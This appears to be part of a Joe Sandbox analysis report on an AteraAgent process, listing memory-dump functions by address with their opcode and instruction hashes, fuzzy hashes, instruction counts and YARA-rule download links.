                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6afd782cbd52a7ce3578bd42d233a6fc5b7e5a745768c829ec5f1027bd65e0b7
                                                                                                                                                                                                                                                                            • Instruction ID: 586abfab0cf26498c8c5dccce485444adfb338cc1522b1bc11a09d5e8eb419a6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6afd782cbd52a7ce3578bd42d233a6fc5b7e5a745768c829ec5f1027bd65e0b7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2E0ED3270C90D8F9F88EE18D451DDA73A1FBA93257105156D00AC7155DA31E852CBC0
                                                                                                                                                                                                                                                                            Function 00007FFAAB47FC51 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f2de9cb56f1f69ac2db2a8d6f9ad7a02099fc71715ad7e004b8338a68bb462a6
                                                                                                                                                                                                                                                                            • Instruction ID: aa153a88ecfcc2a2b73131a1c3806de637b9ea5b653dd1b151aad8599eecdae9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2de9cb56f1f69ac2db2a8d6f9ad7a02099fc71715ad7e004b8338a68bb462a6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43E04F37B0DA488FABA8C99C784A1FEB7D2E79A125B14437FD14ED3659CD21881683C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46BC4A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: bdeed1d777db7671129002250bc05029fe5e9ecec08ff668100f168fc323d4d2
                                                                                                                                                                                                                                                                            • Instruction ID: 3f260f7c33361e9a053446a6f03938dd08458ce493623e7fc8ef4d00aa036a1c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bdeed1d777db7671129002250bc05029fe5e9ecec08ff668100f168fc323d4d2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3F054A5E25609DBE744F798C8959ACB7F2FFC8741F454074E04DD3292DE296C018751
                                                                                                                                                                                                                                                                            Function 00007FFAAB46A0A5 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 39594460f6994421d5c93b40d32aa262d513ad368ccf8fc23ef4248bca702ce2
                                                                                                                                                                                                                                                                            • Instruction ID: 8b764e83c656cdcfba25e191dd9d37fb9a0cd6b14f8c1819b863531f506ebb30
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39594460f6994421d5c93b40d32aa262d513ad368ccf8fc23ef4248bca702ce2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4E02B77A053846BC7457B69F4105EEBBB0EB82351F6004FBC14CCB402CE2014558BA2
                                                                                                                                                                                                                                                                            Function 00007FFAAB46AF5E Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 92cc2b34672fa9da27359e459d2706d91721f9c339b8b59af3f75b580b11f811
                                                                                                                                                                                                                                                                            • Instruction ID: 9e73492d31a806affc7e4be65235a231f53ccd8eb5ffdbcb1647eac37ad5d4d2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92cc2b34672fa9da27359e459d2706d91721f9c339b8b59af3f75b580b11f811
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BE048D180FBD15FE7565774886A8A0BFD49F1B250B0C84F6D14CCB0B3D549A4099353
                                                                                                                                                                                                                                                                            Function 00007FFAAB46A0A8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 909726a59e253984f03895d6174542fbef3fc067bd35e046a477c3c23d08efd3
                                                                                                                                                                                                                                                                            • Instruction ID: 11ae55c8f0f2ace35dad756ca1eb1ba3a059c906d6e569a10ec86b6b1e917d91
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 909726a59e253984f03895d6174542fbef3fc067bd35e046a477c3c23d08efd3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E022B7A0A244ABD705BBB8F4105EEBBB0EB82350F2044FBC00CCB043CE2028544B92
                                                                                                                                                                                                                                                                            Function 00007FFAAB483B99 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d8fdb431e4e4b11029aa1e0fc9546785d5f47d7535827865fdc0d7056269cc3e
                                                                                                                                                                                                                                                                            • Instruction ID: 1ff3d3f78c74783fcd2dec3f05ee394caab5aacea21dde7b3867b112b7c5ee53
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8fdb431e4e4b11029aa1e0fc9546785d5f47d7535827865fdc0d7056269cc3e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38E048327095058BE718EB5494906F47352EB96350F14863AE41EC72E5DD69A58583C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB48398B Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: df9bc3cb8e150985f842d8a4a360c8ace00ddb12a3dd9cadfe9064dafca4874e
                                                                                                                                                                                                                                                                            • Instruction ID: 8b2bf8fcdf95d7cc8576adb29b0be45dfeec4d34e053cb74d243c95399c0c145
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df9bc3cb8e150985f842d8a4a360c8ace00ddb12a3dd9cadfe9064dafca4874e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E046303089188FD6A0DF1CE484BA873E1FF48351B5140AAE08ECB275CA28DCC19B80
                                                                                                                                                                                                                                                                            Function 00007FFAAB468075 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 051f7b3c1e4a15ee8c96975463332f144911ceaff54d9cb047ff49644b5bf42b
                                                                                                                                                                                                                                                                            • Instruction ID: 0e98b9deea667e1e27dca8ceb112d97095b05ef05c1409d50344a94171fcf8e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 051f7b3c1e4a15ee8c96975463332f144911ceaff54d9cb047ff49644b5bf42b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7E0EE72E0491D8ECBA4EB68E851BEDB7B1FF88201F4000BAE00DE3242CE356981CB40
                                                                                                                                                                                                                                                                            Function 00007FFAAB47EE10 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 05f8b455b061c4dd3e7f4b7f34450142ab708ca9ad913f108b5b31eaf0c68ed7
                                                                                                                                                                                                                                                                            • Instruction ID: b43c86081a7b2627d5074566a309b2e8485a485752f01adc57bcf1a285a15955
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05f8b455b061c4dd3e7f4b7f34450142ab708ca9ad913f108b5b31eaf0c68ed7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE0122051BA898FDB8AF77D49419543BE09F5B284FD801E2D88CDF663E04D999EC363
                                                                                                                                                                                                                                                                            Function 00007FFAAB4808C6 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2a1d78781bc2b81337fe96ea3578d606e77dd13f507756a1e036aa31c6be8879
                                                                                                                                                                                                                                                                            • Instruction ID: e30ae5e1f39dac2cde83d28f5207c13cd3419b0c1c88ee5769bd52654bce5a51
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a1d78781bc2b81337fe96ea3578d606e77dd13f507756a1e036aa31c6be8879
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADD05E3221980A8FAA94E35CB4555B4B3D1EBD5271B1601A2D01CC3261DE15DC828784
                                                                                                                                                                                                                                                                            Function 00007FFAAB4838CD Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7ccac12e33d994c108f6128a3a212f12876e719a6e14e4391f9987162fedc3be
                                                                                                                                                                                                                                                                            • Instruction ID: e1dfc3a1d1cdab9b3c82102d33cc7565515f53dba8cafa58243c4142953a739a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ccac12e33d994c108f6128a3a212f12876e719a6e14e4391f9987162fedc3be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CD05E20B0D8258FE9A0EB5CB45477823C0FF49351F0044B6E05DC72A2CA0E988956C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB472993 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c6b1c48d6d1c9751b13ad495632a42159f2cead738601eac9073fb06bdf04d2a
                                                                                                                                                                                                                                                                            • Instruction ID: 092b4b7f0f70550037bf9355416bd7b5efd635074aba22031637d56fc36a9cf2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6b1c48d6d1c9751b13ad495632a42159f2cead738601eac9073fb06bdf04d2a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70D05E301092418FCB58AE28E080C80B790EF1220435509E8E0048B2E3C52ADC82CB01
                                                                                                                                                                                                                                                                            Function 00007FFAAB46AB00 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ba567446957e2dfc6646eebd8f9cbaa57b12e50174f2fef4cdfed6d8073d7ae1
                                                                                                                                                                                                                                                                            • Instruction ID: 2ba84ef7b1aa3fa103a371b95b1f7de0944e77ee65b8eae304d0820d80cb4733
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba567446957e2dfc6646eebd8f9cbaa57b12e50174f2fef4cdfed6d8073d7ae1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24C08CA0926E098BC718B738C841414B6E0FF09200FC005E4E00CC2240D66C90445746
                                                                                                                                                                                                                                                                            Function 00007FFAAB481B4D Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3eb7e9db011b2b033885bb2e6549a89d682eef8981eaa3bba8ad33bbc25522a0
                                                                                                                                                                                                                                                                            • Instruction ID: 946cd19bb7d5980def2f1b0040cde7b0efc066b34f5418d6bd65844649ffa9b7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3eb7e9db011b2b033885bb2e6549a89d682eef8981eaa3bba8ad33bbc25522a0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33B09B51E19B899B65B4879C10193755FC3D7995517054117945DC315DDE5044470282